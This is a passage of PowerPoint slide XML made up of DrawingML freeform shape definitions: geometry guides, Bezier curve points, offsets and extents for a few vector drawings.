                    <a:pt x="131" y="77"/>
                    <a:pt x="140" y="64"/>
                    <a:pt x="140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ṧḻíḋe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7084550" y="3032529"/>
              <a:ext cx="299935" cy="513980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 93"/>
                <a:gd name="T1" fmla="*/ 55 h 159"/>
                <a:gd name="T2" fmla="*/ 52 w 93"/>
                <a:gd name="T3" fmla="*/ 35 h 159"/>
                <a:gd name="T4" fmla="*/ 81 w 93"/>
                <a:gd name="T5" fmla="*/ 21 h 159"/>
                <a:gd name="T6" fmla="*/ 81 w 93"/>
                <a:gd name="T7" fmla="*/ 10 h 159"/>
                <a:gd name="T8" fmla="*/ 59 w 93"/>
                <a:gd name="T9" fmla="*/ 0 h 159"/>
                <a:gd name="T10" fmla="*/ 58 w 93"/>
                <a:gd name="T11" fmla="*/ 0 h 159"/>
                <a:gd name="T12" fmla="*/ 44 w 93"/>
                <a:gd name="T13" fmla="*/ 29 h 159"/>
                <a:gd name="T14" fmla="*/ 39 w 93"/>
                <a:gd name="T15" fmla="*/ 35 h 159"/>
                <a:gd name="T16" fmla="*/ 34 w 93"/>
                <a:gd name="T17" fmla="*/ 41 h 159"/>
                <a:gd name="T18" fmla="*/ 24 w 93"/>
                <a:gd name="T19" fmla="*/ 52 h 159"/>
                <a:gd name="T20" fmla="*/ 20 w 93"/>
                <a:gd name="T21" fmla="*/ 55 h 159"/>
                <a:gd name="T22" fmla="*/ 17 w 93"/>
                <a:gd name="T23" fmla="*/ 58 h 159"/>
                <a:gd name="T24" fmla="*/ 10 w 93"/>
                <a:gd name="T25" fmla="*/ 64 h 159"/>
                <a:gd name="T26" fmla="*/ 4 w 93"/>
                <a:gd name="T27" fmla="*/ 71 h 159"/>
                <a:gd name="T28" fmla="*/ 0 w 93"/>
                <a:gd name="T29" fmla="*/ 79 h 159"/>
                <a:gd name="T30" fmla="*/ 4 w 93"/>
                <a:gd name="T31" fmla="*/ 84 h 159"/>
                <a:gd name="T32" fmla="*/ 13 w 93"/>
                <a:gd name="T33" fmla="*/ 81 h 159"/>
                <a:gd name="T34" fmla="*/ 22 w 93"/>
                <a:gd name="T35" fmla="*/ 79 h 159"/>
                <a:gd name="T36" fmla="*/ 35 w 93"/>
                <a:gd name="T37" fmla="*/ 71 h 159"/>
                <a:gd name="T38" fmla="*/ 37 w 93"/>
                <a:gd name="T39" fmla="*/ 71 h 159"/>
                <a:gd name="T40" fmla="*/ 40 w 93"/>
                <a:gd name="T41" fmla="*/ 73 h 159"/>
                <a:gd name="T42" fmla="*/ 23 w 93"/>
                <a:gd name="T43" fmla="*/ 104 h 159"/>
                <a:gd name="T44" fmla="*/ 20 w 93"/>
                <a:gd name="T45" fmla="*/ 104 h 159"/>
                <a:gd name="T46" fmla="*/ 12 w 93"/>
                <a:gd name="T47" fmla="*/ 119 h 159"/>
                <a:gd name="T48" fmla="*/ 9 w 93"/>
                <a:gd name="T49" fmla="*/ 134 h 159"/>
                <a:gd name="T50" fmla="*/ 29 w 93"/>
                <a:gd name="T51" fmla="*/ 131 h 159"/>
                <a:gd name="T52" fmla="*/ 37 w 93"/>
                <a:gd name="T53" fmla="*/ 112 h 159"/>
                <a:gd name="T54" fmla="*/ 61 w 93"/>
                <a:gd name="T55" fmla="*/ 80 h 159"/>
                <a:gd name="T56" fmla="*/ 64 w 93"/>
                <a:gd name="T57" fmla="*/ 85 h 159"/>
                <a:gd name="T58" fmla="*/ 64 w 93"/>
                <a:gd name="T59" fmla="*/ 86 h 159"/>
                <a:gd name="T60" fmla="*/ 50 w 93"/>
                <a:gd name="T61" fmla="*/ 124 h 159"/>
                <a:gd name="T62" fmla="*/ 36 w 93"/>
                <a:gd name="T63" fmla="*/ 137 h 159"/>
                <a:gd name="T64" fmla="*/ 27 w 93"/>
                <a:gd name="T65" fmla="*/ 154 h 159"/>
                <a:gd name="T66" fmla="*/ 27 w 93"/>
                <a:gd name="T67" fmla="*/ 157 h 159"/>
                <a:gd name="T68" fmla="*/ 29 w 93"/>
                <a:gd name="T69" fmla="*/ 159 h 159"/>
                <a:gd name="T70" fmla="*/ 30 w 93"/>
                <a:gd name="T71" fmla="*/ 159 h 159"/>
                <a:gd name="T72" fmla="*/ 45 w 93"/>
                <a:gd name="T73" fmla="*/ 155 h 159"/>
                <a:gd name="T74" fmla="*/ 53 w 93"/>
                <a:gd name="T75" fmla="*/ 145 h 159"/>
                <a:gd name="T76" fmla="*/ 66 w 93"/>
                <a:gd name="T77" fmla="*/ 122 h 159"/>
                <a:gd name="T78" fmla="*/ 76 w 93"/>
                <a:gd name="T79" fmla="*/ 95 h 159"/>
                <a:gd name="T80" fmla="*/ 78 w 93"/>
                <a:gd name="T81" fmla="*/ 79 h 159"/>
                <a:gd name="T82" fmla="*/ 73 w 93"/>
                <a:gd name="T83" fmla="*/ 66 h 159"/>
                <a:gd name="T84" fmla="*/ 93 w 93"/>
                <a:gd name="T85" fmla="*/ 43 h 159"/>
                <a:gd name="T86" fmla="*/ 78 w 93"/>
                <a:gd name="T87" fmla="*/ 37 h 159"/>
                <a:gd name="T88" fmla="*/ 61 w 93"/>
                <a:gd name="T89" fmla="*/ 43 h 159"/>
                <a:gd name="T90" fmla="*/ 46 w 93"/>
                <a:gd name="T91" fmla="*/ 51 h 159"/>
                <a:gd name="T92" fmla="*/ 34 w 93"/>
                <a:gd name="T93" fmla="*/ 60 h 159"/>
                <a:gd name="T94" fmla="*/ 30 w 93"/>
                <a:gd name="T95" fmla="*/ 59 h 159"/>
                <a:gd name="T96" fmla="*/ 30 w 93"/>
                <a:gd name="T97" fmla="*/ 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3" h="159">
                  <a:moveTo>
                    <a:pt x="30" y="55"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="54"/>
                    <a:pt x="49" y="36"/>
                    <a:pt x="52" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="30"/>
                    <a:pt x="81" y="32"/>
                    <a:pt x="81" y="21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4"/>
                    <a:pt x="67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38" y="0"/>
                    <a:pt x="52" y="22"/>
                    <a:pt x="44" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="32"/>
                    <a:pt x="40" y="29"/>
                    <a:pt x="39" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="38"/>
                    <a:pt x="37" y="40"/>
                    <a:pt x="34" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="43"/>
                    <a:pt x="24" y="49"/>
                    <a:pt x="24" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="52"/>
                    <a:pt x="21" y="53"/>
                    <a:pt x="20" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="57"/>
                    <a:pt x="19" y="55"/>
                    <a:pt x="17" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="60"/>
                    <a:pt x="13" y="62"/>
                    <a:pt x="10" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="65"/>
                    <a:pt x="5" y="70"/>
                    <a:pt x="4" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="72"/>
                    <a:pt x="0" y="76"/>
                    <a:pt x="0" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="81"/>
                    <a:pt x="2" y="84"/>
                    <a:pt x="4" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="84"/>
                    <a:pt x="11" y="81"/>
                    <a:pt x="13" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="80"/>
                    <a:pt x="19" y="80"/>
                    <a:pt x="22" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="78"/>
                    <a:pt x="32" y="71"/>
                    <a:pt x="35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9" y="71"/>
                    <a:pt x="39" y="72"/>
                    <a:pt x="40" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="87"/>
                    <a:pt x="24" y="99"/>
                    <a:pt x="23" y="104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20" y="110"/>
                    <a:pt x="13" y="112"/>
                    <a:pt x="12" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="120"/>
                    <a:pt x="9" y="130"/>
                    <a:pt x="9" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="138"/>
                    <a:pt x="27" y="137"/>
                    <a:pt x="29" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="125"/>
                    <a:pt x="35" y="117"/>
                    <a:pt x="37" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="107"/>
                    <a:pt x="56" y="80"/>
                    <a:pt x="61" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="80"/>
                    <a:pt x="64" y="84"/>
                    <a:pt x="64" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="86"/>
                    <a:pt x="64" y="86"/>
                    <a:pt x="64" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="104"/>
                    <a:pt x="57" y="113"/>
                    <a:pt x="50" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="129"/>
                    <a:pt x="41" y="135"/>
                    <a:pt x="36" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="140"/>
                    <a:pt x="27" y="143"/>
                    <a:pt x="27" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="157"/>
                    <a:pt x="27" y="157"/>
                    <a:pt x="27" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="158"/>
                    <a:pt x="28" y="159"/>
                    <a:pt x="29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30" y="159"/>
                    <a:pt x="44" y="155"/>
                    <a:pt x="45" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="153"/>
                    <a:pt x="51" y="148"/>
                    <a:pt x="53" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="141"/>
                    <a:pt x="65" y="128"/>
                    <a:pt x="66" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="113"/>
                    <a:pt x="73" y="106"/>
                    <a:pt x="76" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="90"/>
                    <a:pt x="77" y="84"/>
                    <a:pt x="78" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="71"/>
                    <a:pt x="73" y="72"/>
                    <a:pt x="73" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="63"/>
                    <a:pt x="93" y="47"/>
                    <a:pt x="93" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="39"/>
                    <a:pt x="83" y="37"/>
                    <a:pt x="78" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="38"/>
                    <a:pt x="64" y="41"/>
                    <a:pt x="61" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="44"/>
                    <a:pt x="49" y="48"/>
                    <a:pt x="46" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="52"/>
                    <a:pt x="35" y="60"/>
                    <a:pt x="34" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="60"/>
                    <a:pt x="33" y="60"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="57"/>
                    <a:pt x="30" y="58"/>
                    <a:pt x="30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śḷïḑè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5440360" y="2960272"/>
              <a:ext cx="3259749" cy="669401"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 66 w 1011"/>
                <a:gd name="T1" fmla="*/ 51 h 207"/>
                <a:gd name="T2" fmla="*/ 70 w 1011"/>
                <a:gd name="T3" fmla="*/ 58 h 207"/>
                <a:gd name="T4" fmla="*/ 52 w 1011"/>
                <a:gd name="T5" fmla="*/ 71 h 207"/>
                <a:gd name="T6" fmla="*/ 25 w 1011"/>
                <a:gd name="T7" fmla="*/ 207 h 207"/>
                <a:gd name="T8" fmla="*/ 42 w 1011"/>
                <a:gd name="T9" fmla="*/ 163 h 207"/>
                <a:gd name="T10" fmla="*/ 63 w 1011"/>
                <a:gd name="T11" fmla="*/ 95 h 207"/>
                <a:gd name="T12" fmla="*/ 86 w 1011"/>
                <a:gd name="T13" fmla="*/ 75 h 207"/>
                <a:gd name="T14" fmla="*/ 100 w 1011"/>
                <a:gd name="T15" fmla="*/ 45 h 207"/>
                <a:gd name="T16" fmla="*/ 72 w 1011"/>
                <a:gd name="T17" fmla="*/ 32 h 207"/>
                <a:gd name="T18" fmla="*/ 56 w 1011"/>
                <a:gd name="T19" fmla="*/ 33 h 207"/>
                <a:gd name="T20" fmla="*/ 50 w 1011"/>
                <a:gd name="T21" fmla="*/ 21 h 207"/>
                <a:gd name="T22" fmla="*/ 33 w 1011"/>
                <a:gd name="T23" fmla="*/ 0 h 207"/>
                <a:gd name="T24" fmla="*/ 20 w 1011"/>
                <a:gd name="T25" fmla="*/ 34 h 207"/>
                <a:gd name="T26" fmla="*/ 0 w 1011"/>
                <a:gd name="T27" fmla="*/ 61 h 207"/>
                <a:gd name="T28" fmla="*/ 22 w 1011"/>
                <a:gd name="T29" fmla="*/ 83 h 207"/>
                <a:gd name="T30" fmla="*/ 5 w 1011"/>
                <a:gd name="T31" fmla="*/ 106 h 207"/>
                <a:gd name="T32" fmla="*/ 14 w 1011"/>
                <a:gd name="T33" fmla="*/ 113 h 207"/>
                <a:gd name="T34" fmla="*/ 19 w 1011"/>
                <a:gd name="T35" fmla="*/ 173 h 207"/>
                <a:gd name="T36" fmla="*/ 18 w 1011"/>
                <a:gd name="T37" fmla="*/ 190 h 207"/>
                <a:gd name="T38" fmla="*/ 968 w 1011"/>
                <a:gd name="T39" fmla="*/ 193 h 207"/>
                <a:gd name="T40" fmla="*/ 984 w 1011"/>
                <a:gd name="T41" fmla="*/ 167 h 207"/>
                <a:gd name="T42" fmla="*/ 1011 w 1011"/>
                <a:gd name="T43" fmla="*/ 134 h 207"/>
                <a:gd name="T44" fmla="*/ 997 w 1011"/>
                <a:gd name="T45" fmla="*/ 128 h 207"/>
                <a:gd name="T46" fmla="*/ 987 w 1011"/>
                <a:gd name="T47" fmla="*/ 129 h 207"/>
                <a:gd name="T48" fmla="*/ 985 w 1011"/>
                <a:gd name="T49" fmla="*/ 99 h 207"/>
                <a:gd name="T50" fmla="*/ 977 w 1011"/>
                <a:gd name="T51" fmla="*/ 91 h 207"/>
                <a:gd name="T52" fmla="*/ 965 w 1011"/>
                <a:gd name="T53" fmla="*/ 94 h 207"/>
                <a:gd name="T54" fmla="*/ 967 w 1011"/>
                <a:gd name="T55" fmla="*/ 114 h 207"/>
                <a:gd name="T56" fmla="*/ 964 w 1011"/>
                <a:gd name="T57" fmla="*/ 128 h 207"/>
                <a:gd name="T58" fmla="*/ 946 w 1011"/>
                <a:gd name="T59" fmla="*/ 133 h 207"/>
                <a:gd name="T60" fmla="*/ 941 w 1011"/>
                <a:gd name="T61" fmla="*/ 129 h 207"/>
                <a:gd name="T62" fmla="*/ 926 w 1011"/>
                <a:gd name="T63" fmla="*/ 132 h 207"/>
                <a:gd name="T64" fmla="*/ 912 w 1011"/>
                <a:gd name="T65" fmla="*/ 151 h 207"/>
                <a:gd name="T66" fmla="*/ 920 w 1011"/>
                <a:gd name="T67" fmla="*/ 165 h 207"/>
                <a:gd name="T68" fmla="*/ 933 w 1011"/>
                <a:gd name="T69" fmla="*/ 164 h 207"/>
                <a:gd name="T70" fmla="*/ 965 w 1011"/>
                <a:gd name="T71" fmla="*/ 154 h 207"/>
                <a:gd name="T72" fmla="*/ 972 w 1011"/>
                <a:gd name="T73" fmla="*/ 159 h 207"/>
                <a:gd name="T74" fmla="*/ 952 w 1011"/>
                <a:gd name="T75" fmla="*/ 171 h 207"/>
                <a:gd name="T76" fmla="*/ 945 w 1011"/>
                <a:gd name="T77" fmla="*/ 19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1" h="207">
                  <a:moveTo>
                    <a:pt x="49" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="54"/>
                    <a:pt x="57" y="52"/>
                    <a:pt x="66" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="52"/>
                    <a:pt x="70" y="53"/>
                    <a:pt x="70" y="55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61"/>
                    <a:pt x="57" y="71"/>
                    <a:pt x="54" y="71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49" y="71"/>
                    <a:pt x="49" y="67"/>
                    <a:pt x="49" y="64"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25" y="207"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="203"/>
                    <a:pt x="38" y="200"/>
                    <a:pt x="38" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="180"/>
                    <a:pt x="40" y="172"/>
                    <a:pt x="42" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="148"/>
                    <a:pt x="42" y="122"/>
                    <a:pt x="45" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="98"/>
                    <a:pt x="55" y="99"/>
                    <a:pt x="63" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="92"/>
                    <a:pt x="73" y="86"/>
                    <a:pt x="78" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="79"/>
                    <a:pt x="84" y="77"/>
                    <a:pt x="86" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="72"/>
                    <a:pt x="91" y="70"/>
                    <a:pt x="94" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="59"/>
                    <a:pt x="97" y="51"/>
                    <a:pt x="100" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="38"/>
                    <a:pt x="95" y="33"/>
                    <a:pt x="85" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="33"/>
                    <a:pt x="75" y="33"/>
                    <a:pt x="72" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="31"/>
                    <a:pt x="67" y="33"/>
                    <a:pt x="62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4" y="33"/>
                    <a:pt x="50" y="30"/>
                    <a:pt x="50" y="28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18"/>
                    <a:pt x="51" y="13"/>
                    <a:pt x="52" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="3"/>
                    <a:pt x="46" y="0"/>
                    <a:pt x="33" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="0"/>
                    <a:pt x="24" y="8"/>
                    <a:pt x="23" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="23"/>
                    <a:pt x="24" y="27"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="41"/>
                    <a:pt x="15" y="41"/>
                    <a:pt x="8" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="48"/>
                    <a:pt x="0" y="55"/>
                    <a:pt x="0" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="72"/>
                    <a:pt x="3" y="70"/>
                    <a:pt x="12" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="73"/>
                    <a:pt x="22" y="77"/>
                    <a:pt x="22" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="83"/>
                    <a:pt x="22" y="83"/>
                    <a:pt x="22" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="92"/>
                    <a:pt x="5" y="93"/>
                    <a:pt x="5" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="106"/>
                    <a:pt x="5" y="106"/>
                    <a:pt x="5" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="114"/>
                    <a:pt x="8" y="113"/>
                    <a:pt x="14" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="113"/>
                    <a:pt x="19" y="133"/>
                    <a:pt x="19" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="152"/>
                    <a:pt x="19" y="164"/>
                    <a:pt x="19" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="178"/>
                    <a:pt x="17" y="182"/>
                    <a:pt x="17" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="185"/>
                    <a:pt x="18" y="186"/>
                    <a:pt x="18" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="192"/>
                    <a:pt x="19" y="204"/>
                    <a:pt x="25" y="207"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="968" y="193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="973" y="191"/>
                    <a:pt x="975" y="187"/>
                    <a:pt x="979" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="981" y="179"/>
                    <a:pt x="984" y="172"/>
                    <a:pt x="984" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="984" y="155"/>
                    <a:pt x="982" y="155"/>
                    <a:pt x="989" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="150"/>
                    <a:pt x="1011" y="148"/>
                    <a:pt x="1011" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1011" y="132"/>
                    <a:pt x="1011" y="131"/>
                    <a:pt x="1010" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="997" y="128"/>
                    <a:pt x="997" y="128"/>
                    <a:pt x="997" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="995" y="128"/>
                    <a:pt x="995" y="129"/>
                    <a:pt x="994" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="987" y="129"/>
                    <a:pt x="987" y="129"/>
                    <a:pt x="987" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="983" y="129"/>
                    <a:pt x="977" y="126"/>
                    <a:pt x="977" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="977" y="119"/>
                    <a:pt x="985" y="112"/>
                    <a:pt x="985" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="985" y="95"/>
                    <a:pt x="985" y="95"/>
                    <a:pt x="985" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="985" y="93"/>
                    <a:pt x="979" y="91"/>
                    <a:pt x="977" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="975" y="91"/>
                    <a:pt x="975" y="91"/>
                    <a:pt x="975" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="975" y="91"/>
                    <a:pt x="965" y="93"/>
                    <a:pt x="965" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="962" y="95"/>
                    <a:pt x="960" y="96"/>
                    <a:pt x="959" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="957" y="111"/>
                    <a:pt x="967" y="106"/>
                    <a:pt x="967" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="967" y="123"/>
                    <a:pt x="967" y="123"/>
                    <a:pt x="967" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="967" y="124"/>
                    <a:pt x="965" y="126"/>
                    <a:pt x="964" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="963" y="130"/>
                    <a:pt x="961" y="130"/>
                    <a:pt x="958" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="950" y="130"/>
                    <a:pt x="951" y="130"/>
                    <a:pt x="946" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="939" y="133"/>
                    <a:pt x="939" y="133"/>
                    <a:pt x="939" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="941" y="129"/>
                    <a:pt x="941" y="129"/>
                    <a:pt x="941" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="938" y="128"/>
                    <a:pt x="938" y="128"/>
                    <a:pt x="938" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="128"/>
                    <a:pt x="935" y="130"/>
                    <a:pt x="926" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="929" y="137"/>
                    <a:pt x="931" y="129"/>
                    <a:pt x="935" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="924" y="137"/>
                    <a:pt x="916" y="144"/>
                    <a:pt x="912" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="917" y="164"/>
                    <a:pt x="917" y="164"/>
                    <a:pt x="917" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="918" y="165"/>
                    <a:pt x="918" y="165"/>
                    <a:pt x="920" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="920" y="165"/>
                    <a:pt x="920" y="165"/>
                    <a:pt x="920" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="921" y="165"/>
                    <a:pt x="930" y="164"/>
                    <a:pt x="933" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="935" y="164"/>
                    <a:pt x="942" y="161"/>
                    <a:pt x="944" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="948" y="159"/>
                    <a:pt x="961" y="154"/>
                    <a:pt x="965" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="966" y="154"/>
                    <a:pt x="966" y="154"/>
                    <a:pt x="966" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="969" y="154"/>
                    <a:pt x="972" y="157"/>
                    <a:pt x="972" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="972" y="161"/>
                    <a:pt x="968" y="168"/>
                    <a:pt x="967" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="964" y="171"/>
                    <a:pt x="957" y="171"/>
                    <a:pt x="952" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="951" y="172"/>
                    <a:pt x="945" y="179"/>
                    <a:pt x="945" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="945" y="190"/>
                    <a:pt x="945" y="190"/>
                    <a:pt x="945" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="947" y="202"/>
                    <a:pt x="960" y="198"/>
                    <a:pt x="968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šḻïḑe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5301300" y="3756463"/>
              <a:ext cx="184051" cy="162238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 68 w 135"/>
                <a:gd name="T1" fmla="*/ 85 h 119"/>
                <a:gd name="T2" fmla="*/ 66 w 135"/>
                <a:gd name="T3" fmla="*/ 85 h 119"/>
                <a:gd name="T4" fmla="*/ 42 w 135"/>
                <a:gd name="T5" fmla="*/ 0 h 119"/>
                <a:gd name="T6" fmla="*/ 0 w 135"/>
                <a:gd name="T7" fmla="*/ 0 h 119"/>
                <a:gd name="T8" fmla="*/ 0 w 135"/>
                <a:gd name="T9" fmla="*/ 119 h 119"/>
                <a:gd name="T10" fmla="*/ 23 w 135"/>
                <a:gd name="T11" fmla="*/ 119 h 119"/>
